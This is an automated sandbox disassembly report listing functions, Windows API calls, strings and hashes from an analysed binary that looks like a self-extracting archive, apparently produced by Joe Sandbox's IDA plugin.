                                Function 00D7A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1004 d7a2c7-d7a2e6 GetClassNameW 1005 d7a30e-d7a310 1004->1005 1006 d7a2e8-d7a2fd call d717ac 1004->1006 1007 d7a312-d7a315 SHAutoComplete 1005->1007 1008 d7a31b-d7a31f 1005->1008 1011 d7a2ff-d7a30b FindWindowExW 1006->1011 1012 d7a30d 1006->1012 1007->1008 1011->1012 1012->1005
                                APIs
                                • GetClassNameW.USER32(?,?,00000050), ref: 00D7A2DE
                                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D7A315
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D7A305
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                • String ID: EDIT
                                • API String ID: 4243998846-3080729518
                                • Opcode ID: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                                • Instruction ID: 450c76c7b65f508e573e35fa707cee0da39d2cdaec8d93de3d55241c4f87a899
                                • Opcode Fuzzy Hash: e61a940575b1765c20d71d8f2e1e31c95d31df49c0ecd9321fd1167fc05cfdaf
                                • Instruction Fuzzy Hash: ADF08232A0132977E7205A689C05FEF776C9B86B50F484156BD49E2280E7609946C6F6
                                Function 00D7D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1013 d7d287-d7d2b2 call d7e360 SetEnvironmentVariableW call d6fbd8 1017 d7d2b7-d7d2bb 1013->1017 1018 d7d2df-d7d2e3 1017->1018 1019 d7d2bd-d7d2c1 1017->1019 1020 d7d2ca-d7d2d1 call d6fcf1 1019->1020 1023 d7d2c3-d7d2c9 1020->1023 1024 d7d2d3-d7d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1018
                                APIs
                                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: EnvironmentVariable
                                • String ID: sfxcmd$sfxpar
                                • API String ID: 1431749950-3493335439
                                • Opcode ID: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                                • Instruction ID: 6be81edb2da2bd0adcc86ba0cb0132e21e29ad09cd58c478fbcefb8841b13282
                                • Opcode Fuzzy Hash: 5bbd4c6c6074b4e05b97906f21c81c1ead82fe52daa24a67530db9d5c4f08a73
                                • Instruction Fuzzy Hash: 7AF0A771801728A7CB212FD4AC0AABA7769EF09741B044562FC8CA6252E661CD41D7F5
                                Function 00D6984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1025 d6984e-d6985a 1026 d69867-d6987e ReadFile 1025->1026 1027 d6985c-d69864 GetStdHandle 1025->1027 1028 d69880-d69889 call d69989 1026->1028 1029 d698da 1026->1029 1027->1026 1033 d698a2-d698a6 1028->1033 1034 d6988b-d69893 1028->1034 1031 d698dd-d698e2 1029->1031 1036 d698b7-d698bb 1033->1036 1037 d698a8-d698b1 GetLastError 1033->1037 1034->1033 1035 d69895 1034->1035 1038 d69896-d698a0 call d6984e 1035->1038 1040 d698d5-d698d8 1036->1040 1041 d698bd-d698c5 1036->1041 1037->1036 1039 d698b3-d698b5 1037->1039 1038->1031 1039->1031 1040->1031 1041->1040 1043 d698c7-d698d0 GetLastError 1041->1043 1043->1040 1045 d698d2-d698d3 1043->1045 1045->1038
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00D6985E
                                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D69876
                                • GetLastError.KERNEL32 ref: 00D698A8
                                • GetLastError.KERNEL32 ref: 00D698C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLast$FileHandleRead
                                • String ID:
                                • API String ID: 2244327787-0
                                • Opcode ID: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                                • Instruction ID: 263790307c04b6f6f5ace4e8d251986082cbaf7095d447ed8906b98d66307d76
                                • Opcode Fuzzy Hash: 66426cad1fed90740277ced9bbe1177b0510bfcab8ffcdc3ed2bea5b74d336e7
                                • Instruction Fuzzy Hash: FD117C30900204EBDB209F51C824A79B7ACEB06771F14862AF86AC7690D735DE489F71
                                Function 00D8A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00D83713,00000000,00000000,?,00D8A49B,00D83713,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue), ref: 00D8A526
                                • GetLastError.KERNEL32(?,00D8A49B,00D83713,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000,00000364,?,00D89077), ref: 00D8A532
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D8A49B,00D83713,00000000,00000000,00000000,?,00D8A698,00000006,FlsSetValue,00D97348,00D97350,00000000), ref: 00D8A540
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                                • Instruction ID: fd72f8855906b274747b9be08f6249ce49ef17ff3ef7b2a733773c4c5f8bca52
                                • Opcode Fuzzy Hash: a40082cc75fbf694c2a78ef77500e18ddc5ee9da1b403ea81b4063006d29df47
                                • Instruction Fuzzy Hash: FB01F736611323ABD7219A6C9C44E567B58AF45BA17140563F90AD3240D731DD40C7F1
                                Function 00D69F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00D6CC94,00000001,?,?,?,00000000,00D74ECD,?,?,?), ref: 00D69F4C
                                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00D74ECD,?,?,?,?,?,00D74972,?), ref: 00D69F8E
                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00D6CC94,00000001,?,?), ref: 00D69FB8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileWrite$Handle
                                • String ID:
                                • API String ID: 4209713984-0
                                • Opcode ID: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                                • Instruction ID: 12af2403f7002c85b895a180580d12a5de5ef5a30ba585761da6cc78523c641f
                                • Opcode Fuzzy Hash: d9fd5acbcdd46ee6231eab1069dfd4921a6ae686e3728a03e6e162b98ae21a0b
                                • Instruction Fuzzy Hash: 5331E2712083059BDF208F28D858B6AFBA8EF91710F084559F885EB285C775DD49CBB2
                                Function 00D6A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A22E
                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A261
                                • GetLastError.KERNEL32(?,?,?,?,00D6A113,?,00000001,00000000,?,?), ref: 00D6A27E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CreateDirectory$ErrorLast
                                • String ID:
                                • API String ID: 2485089472-0
                                • Opcode ID: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                                • Instruction ID: 0dc2b45a7e1c8ba7e4dbbc58a7079684b7982b911762bbac5a1e691b3a1100a4
                                • Opcode Fuzzy Hash: ac87daaba52d9484a9168f30c79cf921b5cfd1ced3c5f6817ad0ffde3dbbbe50
                                • Instruction Fuzzy Hash: 320180311C121467DB229BAD4C55BE97348AF1F781F085452F885F9051DB66CA818EBB
                                Function 00D8AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D8B019
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Info
                                • String ID:
                                • API String ID: 1807457897-3916222277
                                • Opcode ID: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                                • Instruction ID: efc2a2577bc85becf809975fb62375f38ac332557f072bb3d8718d53a17d3306
                                • Opcode Fuzzy Hash: b65ffa38c60caf79b5d2aa59dcb8792b28ed9a055f4d3b1644cc5f8e3c89c1a6
                                • Instruction Fuzzy Hash: D84108B050434C9EDF219E68CC95BF7BBA9DB46714F1804EEE59A87142D3359A45CF30
                                Function 00D8A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00D8A79D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: String
                                • String ID: LCMapStringEx
                                • API String ID: 2568140703-3893581201
                                • Opcode ID: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                                • Instruction ID: 39b0965649d4ae003e3623ff35d79058c3efd3bea4244900fedbc0c9343a976a
                                • Opcode Fuzzy Hash: 18353d5558c65f131b83ac1c2d28c8429eea990b04597cf1ab4eb9477330e3a9
                                • Instruction Fuzzy Hash: 4001D332544209BBDF02AFA4DC05DAE3F66EF08750F054156FE2866160CA729931BBA1
                                Function 00D8A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D89D2F), ref: 00D8A715
                                Strings
                                • InitializeCriticalSectionEx, xrefs: 00D8A6E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CountCriticalInitializeSectionSpin
                                • String ID: InitializeCriticalSectionEx
                                • API String ID: 2593887523-3084827643
                                • Opcode ID: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                                • Instruction ID: fb5affb736b094afc0e764d52aebb80430226f79c784799533120b474e5418fb
                                • Opcode Fuzzy Hash: 40d72540f604258fd5f14e548e4e8d0b53063de3f31c4a9615ee891cb6375390
                                • Instruction Fuzzy Hash: 1CF0E23164531CBBCF016F68DC06CAE7F61EF08720B008166FC196A260DA728E20FBB1
                                Function 00D8A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Alloc
                                • String ID: FlsAlloc
                                • API String ID: 2773662609-671089009
                                • Opcode ID: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                                • Instruction ID: cd75ad416ae9b36668252b269a8ddc1395b80164c5a0ea9486cc38c82e02e7a7
                                • Opcode Fuzzy Hash: a4ac7f654a46f667d4d886164f8554f223f0ea55f38885b9b48e2aa4f2b1997e
                                • Instruction Fuzzy Hash: EBE05530B453287F9B11BB689C028AEBB60CB15B10B410297FC08A7350DE704E0093FA
                                Function 00D8329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 00D832AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: try_get_function
                                • String ID: FlsAlloc
                                • API String ID: 2742660187-671089009
                                • Opcode ID: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                                • Instruction ID: 4b57b82537357f625dc38da5393c918a9f422d09aa7eea72e07c94c038c15566
                                • Opcode Fuzzy Hash: c5fd7a5e2a1196436eb616f5e1c77c3e647e8123e6dd38b051c86641ca1595ee
                                • Instruction Fuzzy Hash: 5ED02B227807347E9A1232C47C03AAEBE04C701FB5F4501F2FF0C6A246D571450003F9
                                Function 00D7E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7E20B
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID: 3To
                                • API String ID: 1269201914-245939750
                                • Opcode ID: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                                • Instruction ID: 170700ec1c2ed0b0a8fc870c739cbf6857911aeea6bd4cc45b7aae29dc580525
                                • Opcode Fuzzy Hash: cef9416160f9c2f7e40cb0cb9880023f0280aca8e69f3be06865ec40e29b7272
                                • Instruction Fuzzy Hash: A2B012D126E0027D330C11007F07E36032CCCC0B60330C01FF10ED4081B5808D095032
                                Function 00D8B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D8AF1B: GetOEMCP.KERNEL32(00000000,?,?,00D8B1A5,?), ref: 00D8AF46
                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3C4
                                • GetCPInfo.KERNEL32(00000000,00D8B1EA,?,?,?,00D8B1EA,?,00000000), ref: 00D8B3D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CodeInfoPageValid
                                • String ID:
                                • API String ID: 546120528-0
                                • Opcode ID: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                                • Instruction ID: 93df9ef9859eb180947479eaa9d62d7768974ca1359edae9341dde9e4f003674
                                • Opcode Fuzzy Hash: e24d80be71718ba909983bff11aa1db101ae5cc5a1d473eb3e037ee7b4b3293e
                                • Instruction Fuzzy Hash: CE5136B09002059EEB24EF79C8826BABBE5EF45328F1C846FD0968B253D735D545CBB1
                                Function 00D61385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                                  • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                                • new.LIBCMT ref: 00D613FE
                                  • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                                • Instruction ID: c1342899961c7bd4e09fab39fc49d5f2f82406f3728b05d696ae779e5fd3b030
                                • Opcode Fuzzy Hash: 0938c942e6ae1e8669b2f1a5741e59e5a188c3202f29247648b702e9c226c32a
                                • Instruction Fuzzy Hash: D84134B0805B409EE724DF7984869E7FBE5FF18300F444A2ED2EE83282DB326554CB21
                                Function 00D61380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D61385
                                  • Part of subcall function 00D66057: __EH_prolog.LIBCMT ref: 00D6605C
                                  • Part of subcall function 00D6C827: __EH_prolog.LIBCMT ref: 00D6C82C
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C86F
                                  • Part of subcall function 00D6C827: new.LIBCMT ref: 00D6C893
                                • new.LIBCMT ref: 00D613FE
                                  • Part of subcall function 00D6B07D: __EH_prolog.LIBCMT ref: 00D6B082
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
